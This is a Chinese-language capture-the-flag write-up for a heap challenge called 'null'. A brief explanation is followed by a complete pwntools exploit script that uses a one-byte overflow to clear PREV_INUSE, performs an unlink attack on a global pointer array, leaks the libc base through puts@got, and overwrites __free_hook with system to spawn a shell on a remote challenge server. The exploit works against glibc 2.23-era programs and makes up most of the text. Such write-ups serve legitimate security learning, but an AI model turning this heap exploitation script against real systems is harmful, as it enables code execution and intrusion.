绿城杯 null
题目特征
增
删
改
查
思路
这题没有给 libc，平时也没有用 LibcSearcher 的习惯，这里直接按 glibc 2.23（libc6_2.23-0ubuntu11.2）的偏移来打，泄漏出基址后再核对是否页对齐即可知道猜得对不对。题目把堆指针保存在 bss 上的全局数组（0x602120）里，read_input 存在一个向后多写一字节的溢出：脚本向下一个 chunk 的 size 低字节写入 0x90（不是单纯的 null 字节），把 0x91 改成 0x90 清掉 PREV_INUSE 位，再配合在 chunk 0 里伪造的 fake chunk 和 prev_size，free 时就会向前合并并触发 unlink，把数组项改成指向数组自身的指针。之后先把数组项改成 puts@got 泄漏 libc 基址，再把数组项改成 __free_hook 并写入 system，最后 free 一个内容为 "/bin/sh" 的 chunk 即可拿 shell。
# -*- coding: utf-8 -*-
from pwn import *
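elf = ELF('./1')
p = remote('82.157.5.28', 51004)
# The remote libc is not provided; offsets come from this Ubuntu glibc 2.23 build
# (an unlink + __free_hook exploit only works against that generation of glibc).
libc = ELF('libc6_2.23-0ubuntu11.2_amd64.so')
context.log_level = 'debug'

# Menu wrappers.  Prompts are matched as bytes and numbers are encoded
# explicitly so the script runs under both Python 2 and Python 3 pwntools
# (the original wrapped `content` in str(), which mangles bytes on Python 3).


def alloc(idx, size, content):
    """Menu 1: allocate a chunk of `size` bytes in array slot `idx` and fill it.

    `content` must be bytes; a trailing newline is appended by sendlineafter.
    """
    p.sendlineafter(b'Your choice :', b'1')
    p.sendlineafter(b'Index:', str(idx).encode())
    p.sendlineafter(b'Size of Heap : ', str(size).encode())
    p.sendlineafter(b'Content?:', content)


def delete(index):
    """Menu 2: free the chunk in array slot `index`."""
    p.sendlineafter(b'Your choice :', b'2')
    p.sendlineafter(b'Index:', str(index).encode())


def edit(index, content):
    """Menu 3: overwrite the chunk in slot `index` with `content` (bytes, sent raw).

    This is the path that reaches the overflow in read_input: the unlink
    payload below is 0x49 bytes for a 0x48-byte chunk, so the last byte lands
    on the next chunk's size field.
    """
    p.sendlineafter(b'Your choice :', b'3')
    p.sendlineafter(b'Index:', str(index).encode())
    p.sendafter(b'Content?:', content)


def show(index):
    """Menu 4: print the chunk in slot `index` (used for the libc leak).

    Note the prompt here is 'Index :' with a space, unlike the other menus.
    """
    p.sendlineafter(b'Your choice :', b'4')
    p.sendlineafter(b'Index :', str(index).encode())


# Address of the global pointer array in .bss that holds the heap pointers;
# it is the target of the unlink write.
target = 0x602120
alloc(0, 0x48, b'aaaa')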
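alloc(1, 0x80, b'bbbb')
alloc(2, 0x80, b'cccc')

# Fake free chunk at the start of chunk 0's user data (size field 0x41 -> 0x40).
# fd/bk point just before the global array so that unlink's
# `P->fd->bk == P && P->bk->fd == P` check is satisfied by array[0], which
# holds a pointer to this very fake chunk.
payload = p64(0) + p64(0x41)
payload += p64(target - 0x18) + p64(target - 0x10)
payload += b'a' * 0x20
# chunk 1's prev_size -> fake chunk (0x40 back), then the one-byte overflow
# rewrites the low byte of chunk 1's size (0x91 -> 0x90) to clear PREV_INUSE.
payload += p64(0x40) + b'\x90'
edit(0, payload)

# free(chunk 1) consolidates backwards into the fake chunk and unlinks it,
# leaving array[0] = target - 0x18 (a pointer into the array itself).
delete(1)
# NOTE(review): the second delete(1) is in the original script.  It is harmless
# only if the program nulls the slot after free; otherwise it is a double free
# that glibc 2.23 aborts on ("double free or corruption (!prev)") -- verify.
delete(1)

# Write through array[0]: 0x18 bytes of padding, then array[0] -> the array
# itself, array[1] = 0, array[2] -> puts@got.
edit(0, b'a' * 0x18 + p64(target) + p64(0) + p64(elf.got['puts']))
show(2)
libc.address = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['puts']
print(hex(libc.address))
# A real libc base is page-aligned; anything else means the leak was mis-parsed
# or the guessed libc build (2.23-0ubuntu11.2) does not match the remote.
if libc.address & 0xfff:
    raise SystemExit('bad libc base %#x - wrong libc build or leak?' % libc.address)
pause()

# array[0] -> __free_hook, then write system() there; freeing a chunk whose
# first bytes are "/bin/sh" then calls system("/bin/sh").
edit(0, p64(libc.sym['__free_hook']))
edit(0, p64(libc.sym['system']))
alloc(3, 0x20, b'/bin/sh\x00')
delete(3)
p.interactive()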